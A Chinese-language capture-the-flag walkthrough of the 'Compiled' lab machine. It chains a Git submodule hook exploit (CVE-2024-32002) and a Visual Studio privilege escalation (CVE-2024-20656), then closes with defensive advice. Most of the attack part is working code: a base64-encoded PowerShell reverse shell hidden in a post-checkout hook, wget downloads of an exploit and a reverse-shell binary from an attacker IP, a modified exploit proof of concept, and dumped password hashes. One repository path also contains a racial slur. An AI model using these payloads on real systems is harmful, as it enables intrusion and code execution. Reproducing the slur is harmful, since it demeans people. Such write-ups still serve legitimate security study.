渗透测试实战：Compiled靶机渗透全流程解析<\/h1>

一、信息收集阶段<\/h2>

1. 端口扫描与发现<\/h3>

使用nmap进行端口探测，发现以下开放端口：<\/p>

3000端口：Gitea代码托管平台<\/li>
5000端口：Web应用登录界面<\/li>
5985端口：WinRM服务<\/li>

7680端口：未知服务<\/li> <\/ul>

2. 初步漏洞探测<\/h3>

对5000端口的Web应用进行测试：<\/p>

发现SSRF漏洞，但限制只能提交http协议的网站<\/li>

测试发现无法访问其他页面，返回404错误<\/li> <\/ul>

访问3000端口发现Gitea网站，这是后续攻击的主要入口点。<\/p>

二、漏洞利用阶段<\/h2>

1. CVE-2024-32002漏洞利用<\/h3>

漏洞原理<\/strong>：
当受害者以递归方式克隆恶意存储库时，会执行子模块中包含的钩子。该漏洞存在于Git处理存储库子模块中的符号链接的方式中。<\/p>

漏洞复现步骤<\/strong>：<\/p>

注册Gitea账号<\/li>
创建两个仓库：repo1和repo2<\/li>
在repo1中创建恶意钩子脚本：<\/li> <\/ol>
#!\/bin\/bash <\/span><\/span><\/span><\/span>git config --global protocol.file.allow always <\/span><\/span>git config --global core.symlinks true <\/span><\/span>git config --global init.defaultBranch main <\/span><\/span>rm -rf repo1 <\/span><\/span>rm -rf repo2 <\/span><\/span>git clone http:\/\/gitea.compiled.htb:3000\/xxxxxxxxx\/repo1.git <\/span><\/span>cd repo1 <\/span><\/span>mkdir -p y\/hooks <\/span><\/span>cat > y\/hooks\/post-checkout <<EOF <\/span><\/span><\/span>#!bin\/sh.exe <\/span><\/span><\/span>powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwAMQA0ADUAMQA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== <\/span><\/span><\/span>EOF<\/span> <\/span><\/span>chmod +x y\/hooks\/post-checkout <\/span><\/span>git add y\/hooks\/post-checkout <\/span><\/span>git commit -m "post-checkout"<\/span> <\/span><\/span>git push <\/span><\/span><\/code><\/pre> 在repo2中创建恶意子模块和符号链接：<\/li> <\/ol> cd .. <\/span><\/span>git clone http:\/\/gitea.compiled.htb:3000\/celesian_nlte_cheating_niggers\/repo2.git <\/span><\/span>cd repo2 <\/span><\/span>git submodule add --name x\/y "http:\/\/gitea.compiled.htb:3000\/xxxxxxxxxx\/repo1.git"<\/span> A\/modules\/x <\/span><\/span>git commit -m "add-submodule"<\/span> <\/span><\/span>printf ".git"<\/span> > dotgit.txt <\/span><\/span>git hash-object -w --stdin < dotgit.txt > dot-git.hash <\/span><\/span>printf "120000 %s 0\ta\n"<\/span> "<\/span>$(<\/span>cat dot-git.hash)<\/span>"<\/span> > index.info <\/span><\/span>git update-index --index-info < index.info <\/span><\/span>git commit -m "add-symlink"<\/span> <\/span><\/span>git push <\/span><\/span><\/code><\/pre> 在5000端口的Web应用中提交恶意仓库链接，触发漏洞执行反向shell。<\/li> <\/ol> 2. 内网信息收集<\/h3> 获取初始shell后，进行以下信息收集：<\/p> 检查用户目录和配置文件<\/li> 枚举数据库文件，发现SQLite数据库<\/li> 提取用户凭据：<\/li> <\/ol> select<\/span> name, passwd, passwd_hash_algo from<\/span> user<\/span>; <\/span><\/span><\/code><\/pre>获取到以下用户哈希：<\/p> administrator: 1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d<\/code><\/li> richard: 4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e<\/code><\/li> emily: 97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16<\/code><\/li> 0xdf: 16d47698acf90f528436af0be7e1511722f6a8fa386ae9069de8cd37515dcd06b0d1eece19301077159b8349640efce856ae<\/code><\/li> <\/ul> 哈希算法均为PBKDF2，盐值格式为base64。<\/p> 3. CVE-2024-20656提权漏洞利用<\/h3> 漏洞原理<\/strong>：通过Visual Studio诊断服务中的符号链接处理不当，实现权限提升。<\/p> 利用步骤<\/strong>：<\/p> 创建虚拟目录和连接目录<\/li> 触发VSStandardCollectorService150服务创建诊断会话<\/li> 利用对象管理器符号链接重定向文件操作<\/li> 替换MofCompiler.exe为恶意程序<\/li> <\/ol> POC修改<\/strong>：<\/p> WCHAR cmd[] =<\/span> L<\/span>"C:<\/span>\\<\/span>Program Files (x86)<\/span>\\<\/span>Microsoft Visual Studio<\/span>\\<\/span>2019<\/span>\\<\/span>Community<\/span>\\<\/span>Team Tools<\/span>\\<\/span>DiagnosticsHub<\/span>\\<\/span>Collector<\/span>\\<\/span>VSDiagnostics.exe"<\/span>; <\/span><\/span> <\/span><\/span>void<\/span> cb1<\/span>(){ <\/span><\/span> printf("[*] Oplock!<\/span>\n<\/span>"<\/span>); <\/span><\/span> while<\/span> (!<\/span>Move(hFile2)) {} <\/span><\/span> printf("[+] File moved!<\/span>\n<\/span>"<\/span>); <\/span><\/span> CopyFile(L<\/span>"c:<\/span>\\<\/span>windows<\/span>\\<\/span>system32<\/span>\\<\/span>cmd.exe"<\/span>, L<\/span>"C:<\/span>\\<\/span>ProgramData<\/span>\\<\/span>Microsoft<\/span>\\<\/span>VisualStudio<\/span>\\<\/span>SetupWMI<\/span>\\<\/span>MofCompiler.exe"<\/span>, FALSE); <\/span><\/span> finished =<\/span> TRUE; <\/span><\/span>} <\/span><\/span><\/code><\/pre>实际操作<\/strong>：<\/p> 下载攻击工具：<\/li> <\/ol> wget 10.10.1633\/Expl.exe -outfile e.exe <\/span><\/span>wget 10.10.16.33\/rev-444.exe -outfile r.exe <\/span><\/span><\/code><\/pre> 执行提权攻击，获取SYSTEM权限。<\/li> <\/ol> 三、总结与防护建议<\/h2> 1. 攻击链总结<\/h3> 通过Gitea的CVE-2024-32002漏洞获取初始立足点<\/li> 利用数据库信息收集获取更多凭证<\/li> 通过Visual Studio服务漏洞CVE-2024-20656实现权限提升<\/li> <\/ol> 2. 防护建议<\/h3> 针对CVE-2024-32002<\/strong>：<\/p> 及时更新Git和Gitea到最新版本<\/li> 限制用户创建仓库和子模块的权限<\/li> 审查并禁用不必要的Git钩子<\/li> <\/ul> 针对CVE-2024-20656<\/strong>：<\/p> 更新Visual Studio及相关组件<\/li> 限制对C:\ProgramData\Microsoft\VisualStudio目录的写入权限<\/li> 监控和审核符号链接创建行为<\/li> <\/ul> 通用防护措施<\/strong>：<\/p> 实施最小权限原则<\/li> 定期审计系统配置和权限<\/li> 监控异常进程创建和文件修改行为<\/li> <\/ul>